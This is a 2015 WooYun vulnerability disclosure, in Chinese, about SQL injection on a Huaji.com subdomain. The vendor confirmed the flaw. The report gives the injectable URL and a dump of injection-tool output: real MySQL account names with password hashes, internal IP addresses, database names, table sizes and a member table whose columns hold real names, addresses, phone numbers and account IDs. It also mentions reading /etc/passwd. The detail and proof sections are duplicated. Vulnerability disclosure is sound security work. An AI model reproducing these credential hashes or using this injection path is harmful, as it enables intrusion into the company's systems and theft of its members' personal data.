当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118563

漏洞标题:花集网某站存在注入(root权限,涉及全部数据)

相关厂商:浙江花集网科技有限公司

漏洞作者: 路人甲

提交时间:2015-06-06 10:50

修复时间:2015-07-23 11:14

公开时间:2015-07-23 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-06: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

这么多数据不来个高rank?

详细说明:

http://xue.huaji.com/space/business.php?u=1199795328 注入点
跑一下

Target: 		http://xue.huaji.com/space/business.php?u=1199795328
Host IP:		120.199.8.178
Web Server: 	nginx/1.0.15
Powered-by: 	PHP/5.3.3
DB Server: 	MySQL >=5
Resp. Time(avg):	129 ms
Current User: 	ourbloom@192.168.1.181
Sql Version: 	5.1.52
Current DB: 	hj
System User: 	ourbloom@192.168.1.10
Host Name: 	ourbloom15
Installation dir: 	/usr/
DB User & Pass: 	root:*FEBDA9A686B54CD76590CA68C08BA30F37716241:localhost
		root::ourbloom05
		root::127.0.0.1
		::localhost
		::ourbloom05
		root:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
		ourbloom:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
		huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:192.168.1.1
		huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:183.129.221.18
		huajislave:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
		huajiourbloom:*390EA1B0A375E0FB94E2FB709945E956114E91AF:%
		huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:183.129.221.18
		huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
		hulonglong:*68A06D921D044601680BEEB7524E3E6486553F1D:183.129.221.18
		yushui:*1FA109D10CE615BF44BA9C590E43B8893F85A25F:%
		huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.185
		huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.190
		jiankongbao:*D884AD9E536EF5152D4F08EF66DAED7D9DAAAF67:192.168.1.181
Data Bases: 	information_schema
		hj
		hj1
		hj2
		hj3
		hj4
		hj5
		hj6
		hj7
		hj8
		hj9
		hj_auction
		hj_market
		hj_office
		hwxbbs
		mysql
		seociku
		test


各种数据各种有啊,/etc/passwd读一下

QQ截图20150606012605.jpg


当前库的

Database: hj
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| goods_property       | 211403  |
| rebate_logs          | 123184  |
| rebates              | 55829   |
| member_apply         | 47441   |
| member               | 46027   |
| member_extend        | 46027   |
| seller_apply         | 40891   |
| cms_articleextend    | 36373   |
| cms_articlecontent   | 36247   |
| cms_article          | 35900   |
| goods_image          | 34434   |
| seller               | 27720   |
| quote                | 26372   |
| goods_apply          | 24872   |
| seller_map           | 22281   |
| member_point         | 21020   |
| card                 | 19263   |
| goods                | 18567   |
| charge_seller        | 16545   |
| member_study         | 13365   |
| answer               | 12657   |
| category_goods       | 11554   |
| sponsion             | 11332   |
| gcategory            | 10799   |
| goods_price          | 10046   |
| certify_log          | 8014    |
| sponsion_apply       | 7985    |
| question             | 7884    |
| member_job           | 7004    |
| flower_apply         | 6541    |
| property_value       | 5566    |
| address              | 5271    |
| seller_cooperation   | 4603    |
| employee_resource    | 4301    |
| ad_region            | 3567    |
| fbwords              | 3416    |
| region               | 3285    |
| collect              | 3215    |
| member_ability       | 2809    |
| employee_allowcode   | 2308    |
| seller_plan          | 2261    |
| cart                 | 2025    |
| prefer_member        | 1926    |
| order_complaint      | 1793    |
| sponsion_plan        | 1714    |
| seller_region        | 1698    |
| excellent_apply      | 1472    |
| ad_search_old        | 1419    |
| resource             | 1247    |
| cms_attach           | 1240    |
| property             | 1062    |
| seller_domain        | 909     |
| noshop               | 908     |
| seller_link          | 906     |
| seller_decoration    | 864     |
| image_property       | 786     |
| seller_punish        | 687     |
| product_library      | 592     |
| goods_holiday        | 548     |
| ad_region_order      | 527     |
| florist_log          | 417     |
| excellent_region     | 413     |
| image                | 378     |
| member_astrict       | 317     |
| seller_rights        | 315     |
| ad_region_right      | 291     |
| video_property       | 273     |
| admin_menu           | 262     |
| seller_ratio         | 258     |
| inform               | 251     |
| image_log            | 229     |
| excellent            | 217     |
| ad_order             | 203     |
| feedback             | 191     |
| member_foul          | 190     |
| charge               | 178     |
| compen_logs          | 141     |
| cms_comment          | 138     |
| goods_holiday_master | 137     |
| member_mobile_change | 116     |
| goods_qa             | 95      |
| seller_festival      | 94      |
| compensation         | 93      |
| rebate_log_hj        | 93      |
| ad_region_banner     | 85      |
| member_id_change     | 80      |
| seller_member        | 77      |
| member_cancel        | 72      |
| inform_log           | 65      |
| prefer               | 65      |
| shop_feedback        | 62      |
| employee             | 53      |
| appeal               | 47      |
| ad_region_pic        | 45      |
| store_cancel         | 45      |
| astrict_white        | 44      |
| florist              | 43      |
| topic                | 43      |
| member_id_changelog  | 38      |
| seller_limit_master  | 36      |
| quote_product        | 35      |
| video                | 35      |
| brand_apply          | 23      |
| bill_ourbloom        | 19      |
| bill_bank            | 17      |
| product_librarycate  | 17      |
| cms_column           | 13      |
| dept                 | 12      |
| sms_template         | 12      |
| print_template       | 11      |
| seller_limit         | 11      |
| member_stint         | 9       |
| video_log            | 8       |
| mgrade               | 7       |
| friend_link          | 6       |
| topic_cat            | 5       |
| fbwords_seller       | 4       |
| question_cat         | 4       |
| auto_status          | 3       |
| excellent_price      | 3       |
| seller_price         | 3       |
| goods_rights         | 1       |
| setting              | 1       |
+----------------------+---------+


4w+的会员数据

Table: member
[52 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| activation       | varchar(60)      |
| address          | varchar(256)     |
| alipay_uid       | varchar(60)      |
| birthday         | date             |
| buyer_credit     | float(8,0)       |
| charges          | decimal(6,2)     |
| charges_status   | tinyint(4)       |
| chinese_city     | varchar(32)      |
| chinese_country  | varchar(32)      |
| chinese_province | varchar(32)      |
| chinese_town     | varchar(32)      |
| city             | varchar(8)       |
| cost_ratio       | decimal(6,2)     |
| country          | varchar(8)       |
| default_feed     | tinyint(4)       |
| email            | varchar(60)      |
| expiry           | int(11)          |
| feed_config      | text             |
| gender           | tinyint(4)       |
| guider           | varchar(20)      |
| home_phone       | varchar(60)      |
| huaji_flag       | tinyint(4)       |
| id               | int(11)          |
| last_ip          | varchar(15)      |
| last_login       | int(11)          |
| mobile_phone     | varchar(60)      |
| msn              | varchar(60)      |
| office_phone     | varchar(60)      |
| operator         | varchar(50)      |
| outer_id         | int(11)          |
| password         | varchar(32)      |
| portrait         | varchar(256)     |
| province         | varchar(8)       |
| ptemplate        | tinyint(4)       |
| qq               | varchar(60)      |
| qq_uid           | varchar(100)     |
| real_name        | varchar(60)      |
| reg_ip           | varchar(15)      |
| reg_time         | int(11)          |
| repwd_code       | varchar(32)      |
| seller_credit    | float(8,0)       |
| sina_uid         | int(11)          |
| source_pwd       | varchar(32)      |
| store_id         | int(11)          |
| taobao_uid       | int(11)          |
| test             | tinyint(4)       |
| town             | varchar(8)       |
| ugrade           | tinyint(4)       |
| updatetime       | int(11) unsigned |
| user_name        | varchar(60)      |
| visit_count      | int(11)          |
| zip              | char(6)          |
+------------------+------------------+


qq,淘宝id,新浪id,地址,真实姓名。。。。
跑了几个证明一下

QQ截图20150606013647.jpg


本着发现问题解决问题的原则,就没再继续渗透

漏洞证明:

http://xue.huaji.com/space/business.php?u=1199795328 注入点
跑一下

Target: 		http://xue.huaji.com/space/business.php?u=1199795328
Host IP:		120.199.8.178
Web Server: 	nginx/1.0.15
Powered-by: 	PHP/5.3.3
DB Server: 	MySQL >=5
Resp. Time(avg):	129 ms
Current User: 	ourbloom@192.168.1.181
Sql Version: 	5.1.52
Current DB: 	hj
System User: 	ourbloom@192.168.1.10
Host Name: 	ourbloom15
Installation dir: 	/usr/
DB User & Pass: 	root:*FEBDA9A686B54CD76590CA68C08BA30F37716241:localhost
		root::ourbloom05
		root::127.0.0.1
		::localhost
		::ourbloom05
		root:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
		ourbloom:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
		huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:192.168.1.1
		huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:183.129.221.18
		huajislave:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
		huajiourbloom:*390EA1B0A375E0FB94E2FB709945E956114E91AF:%
		huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:183.129.221.18
		huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
		hulonglong:*68A06D921D044601680BEEB7524E3E6486553F1D:183.129.221.18
		yushui:*1FA109D10CE615BF44BA9C590E43B8893F85A25F:%
		huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.185
		huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.190
		jiankongbao:*D884AD9E536EF5152D4F08EF66DAED7D9DAAAF67:192.168.1.181
Data Bases: 	information_schema
		hj
		hj1
		hj2
		hj3
		hj4
		hj5
		hj6
		hj7
		hj8
		hj9
		hj_auction
		hj_market
		hj_office
		hwxbbs
		mysql
		seociku
		test


各种数据各种有啊,/etc/passwd读一下

QQ截图20150606012605.jpg


当前库的

Database: hj
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| goods_property       | 211403  |
| rebate_logs          | 123184  |
| rebates              | 55829   |
| member_apply         | 47441   |
| member               | 46027   |
| member_extend        | 46027   |
| seller_apply         | 40891   |
| cms_articleextend    | 36373   |
| cms_articlecontent   | 36247   |
| cms_article          | 35900   |
| goods_image          | 34434   |
| seller               | 27720   |
| quote                | 26372   |
| goods_apply          | 24872   |
| seller_map           | 22281   |
| member_point         | 21020   |
| card                 | 19263   |
| goods                | 18567   |
| charge_seller        | 16545   |
| member_study         | 13365   |
| answer               | 12657   |
| category_goods       | 11554   |
| sponsion             | 11332   |
| gcategory            | 10799   |
| goods_price          | 10046   |
| certify_log          | 8014    |
| sponsion_apply       | 7985    |
| question             | 7884    |
| member_job           | 7004    |
| flower_apply         | 6541    |
| property_value       | 5566    |
| address              | 5271    |
| seller_cooperation   | 4603    |
| employee_resource    | 4301    |
| ad_region            | 3567    |
| fbwords              | 3416    |
| region               | 3285    |
| collect              | 3215    |
| member_ability       | 2809    |
| employee_allowcode   | 2308    |
| seller_plan          | 2261    |
| cart                 | 2025    |
| prefer_member        | 1926    |
| order_complaint      | 1793    |
| sponsion_plan        | 1714    |
| seller_region        | 1698    |
| excellent_apply      | 1472    |
| ad_search_old        | 1419    |
| resource             | 1247    |
| cms_attach           | 1240    |
| property             | 1062    |
| seller_domain        | 909     |
| noshop               | 908     |
| seller_link          | 906     |
| seller_decoration    | 864     |
| image_property       | 786     |
| seller_punish        | 687     |
| product_library      | 592     |
| goods_holiday        | 548     |
| ad_region_order      | 527     |
| florist_log          | 417     |
| excellent_region     | 413     |
| image                | 378     |
| member_astrict       | 317     |
| seller_rights        | 315     |
| ad_region_right      | 291     |
| video_property       | 273     |
| admin_menu           | 262     |
| seller_ratio         | 258     |
| inform               | 251     |
| image_log            | 229     |
| excellent            | 217     |
| ad_order             | 203     |
| feedback             | 191     |
| member_foul          | 190     |
| charge               | 178     |
| compen_logs          | 141     |
| cms_comment          | 138     |
| goods_holiday_master | 137     |
| member_mobile_change | 116     |
| goods_qa             | 95      |
| seller_festival      | 94      |
| compensation         | 93      |
| rebate_log_hj        | 93      |
| ad_region_banner     | 85      |
| member_id_change     | 80      |
| seller_member        | 77      |
| member_cancel        | 72      |
| inform_log           | 65      |
| prefer               | 65      |
| shop_feedback        | 62      |
| employee             | 53      |
| appeal               | 47      |
| ad_region_pic        | 45      |
| store_cancel         | 45      |
| astrict_white        | 44      |
| florist              | 43      |
| topic                | 43      |
| member_id_changelog  | 38      |
| seller_limit_master  | 36      |
| quote_product        | 35      |
| video                | 35      |
| brand_apply          | 23      |
| bill_ourbloom        | 19      |
| bill_bank            | 17      |
| product_librarycate  | 17      |
| cms_column           | 13      |
| dept                 | 12      |
| sms_template         | 12      |
| print_template       | 11      |
| seller_limit         | 11      |
| member_stint         | 9       |
| video_log            | 8       |
| mgrade               | 7       |
| friend_link          | 6       |
| topic_cat            | 5       |
| fbwords_seller       | 4       |
| question_cat         | 4       |
| auto_status          | 3       |
| excellent_price      | 3       |
| seller_price         | 3       |
| goods_rights         | 1       |
| setting              | 1       |
+----------------------+---------+


4w+的会员数据

Table: member
[52 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| activation       | varchar(60)      |
| address          | varchar(256)     |
| alipay_uid       | varchar(60)      |
| birthday         | date             |
| buyer_credit     | float(8,0)       |
| charges          | decimal(6,2)     |
| charges_status   | tinyint(4)       |
| chinese_city     | varchar(32)      |
| chinese_country  | varchar(32)      |
| chinese_province | varchar(32)      |
| chinese_town     | varchar(32)      |
| city             | varchar(8)       |
| cost_ratio       | decimal(6,2)     |
| country          | varchar(8)       |
| default_feed     | tinyint(4)       |
| email            | varchar(60)      |
| expiry           | int(11)          |
| feed_config      | text             |
| gender           | tinyint(4)       |
| guider           | varchar(20)      |
| home_phone       | varchar(60)      |
| huaji_flag       | tinyint(4)       |
| id               | int(11)          |
| last_ip          | varchar(15)      |
| last_login       | int(11)          |
| mobile_phone     | varchar(60)      |
| msn              | varchar(60)      |
| office_phone     | varchar(60)      |
| operator         | varchar(50)      |
| outer_id         | int(11)          |
| password         | varchar(32)      |
| portrait         | varchar(256)     |
| province         | varchar(8)       |
| ptemplate        | tinyint(4)       |
| qq               | varchar(60)      |
| qq_uid           | varchar(100)     |
| real_name        | varchar(60)      |
| reg_ip           | varchar(15)      |
| reg_time         | int(11)          |
| repwd_code       | varchar(32)      |
| seller_credit    | float(8,0)       |
| sina_uid         | int(11)          |
| source_pwd       | varchar(32)      |
| store_id         | int(11)          |
| taobao_uid       | int(11)          |
| test             | tinyint(4)       |
| town             | varchar(8)       |
| ugrade           | tinyint(4)       |
| updatetime       | int(11) unsigned |
| user_name        | varchar(60)      |
| visit_count      | int(11)          |
| zip              | char(6)          |
+------------------+------------------+


qq,淘宝id,新浪id,地址,真实姓名。。。。
跑了几个证明一下

QQ截图20150606013647.jpg


本着发现问题解决问题的原则,没再继续渗透

修复方案:

好好查查代码吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-08 11:13

厂商回复:

感谢提交

最新状态:

暂无